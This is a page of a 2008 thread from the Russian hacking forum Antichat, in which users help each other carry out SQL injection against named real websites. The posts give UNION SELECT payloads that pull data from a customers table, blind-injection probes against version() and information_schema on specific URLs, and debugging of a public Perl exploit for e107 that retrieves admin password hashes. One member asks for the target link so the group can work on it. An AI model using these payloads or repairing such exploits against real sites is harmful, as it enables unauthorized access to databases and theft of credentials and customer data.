ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3611  
Старый 10.11.2008, 19:50
Аватар для .acme
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

where not summ10 = ""
 
Ответить с цитированием

  #3612  
Старый 10.11.2008, 20:01
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от .acme  
where not summ10 = ""
Делаю +from+table_name+where+not+summ10=""/*
Ошибка. Не получается.
Если делать так
+from+customers+where+summ10=271/* (значение 271 присутсвует в summ10) то выводит поле со всеми данными этой таблицы. Но мне надо всех, где значение summ10 не пустое..

Последний раз редактировалось Imperou$; 10.11.2008 в 20:03..
 
Ответить с цитированием

  #3613  
Старый 10.11.2008, 20:01
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3 a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10+<>+0/*
 
Ответить с цитированием

  #3614  
Старый 10.11.2008, 20:09
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

[Raz0r]
Огромное спасибо! Вышло! =)
Очень признателен.
 
Ответить с цитированием

  #3615  
Старый 10.11.2008, 20:19
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

***.com/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--

Ошибку выводит

You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1

Число столбцов определил "order by"
Что делать не представляю
 
Ответить с цитированием

  #3616  
Старый 10.11.2008, 20:24
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

diznt попробуй вместо -- подставить /* или вообше там ниче неставь.А вообше кидай сюда линк на сайт если ниче страшного там нет , а люди посотрят что можно сделать
 
Ответить с цитированием

  #3617  
Старый 10.11.2008, 20:25
Аватар для diznt
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Вот линк собственно

http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
 
Ответить с цитированием

  #3618  
Старый 10.11.2008, 21:04
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от diznt  
Вот линк собственно

http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid='&language=ru
Третья ветка
http://hipergroup.com/products.php?lv=3&cate=1&type=25&pid=1'+and+substr ing(version(),1,1)=3/*&language=1
 
Ответить с цитированием

  #3619  
Старый 10.11.2008, 21:31
Аватар для _gr34t
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

сорри. продублирую

есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php

После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
Код:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__

[+] Logged in with your account..
[+] Checking database delay, please wait..

[+] Normal delay: 1
[+] Benchmark delay: 13

[+] Victim password: f

[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
Код:
for(my $j = 1; $j <= 32; $j++)
{  
    foreach $char(@cset)
    {    
        info(chr($char), $hash, "password");
        
        my ($pre_time, $post_time) = time();
        $rv = check_char($char, $j, "user_password");    
        $post_time = time();
    
             if($rv and ($post_time - $pre_time) > ($ndelay + 3))
             {        
                 $hash .= chr($char);
                 last;
             }
    }
    
    last if $j != length($hash);
}    

if(not defined $hash or length($hash) != 32)
{
    print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
    exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
Код:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..

[+] Normal delay: 1
[+] Benchmark delay: 13

[+] Victim password: f

[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я не бум-бум.
 
Ответить с цитированием

  #3620  
Старый 10.11.2008, 22:11
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

почему не катит?:

http://www.ascon.kz/index.php?news=144+and+lower(substr((SELECT+TABLE_ NAME+FROM+INFORMATION_SCHEMA.TABLES+limit+1,1),1,1 ))='c'
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ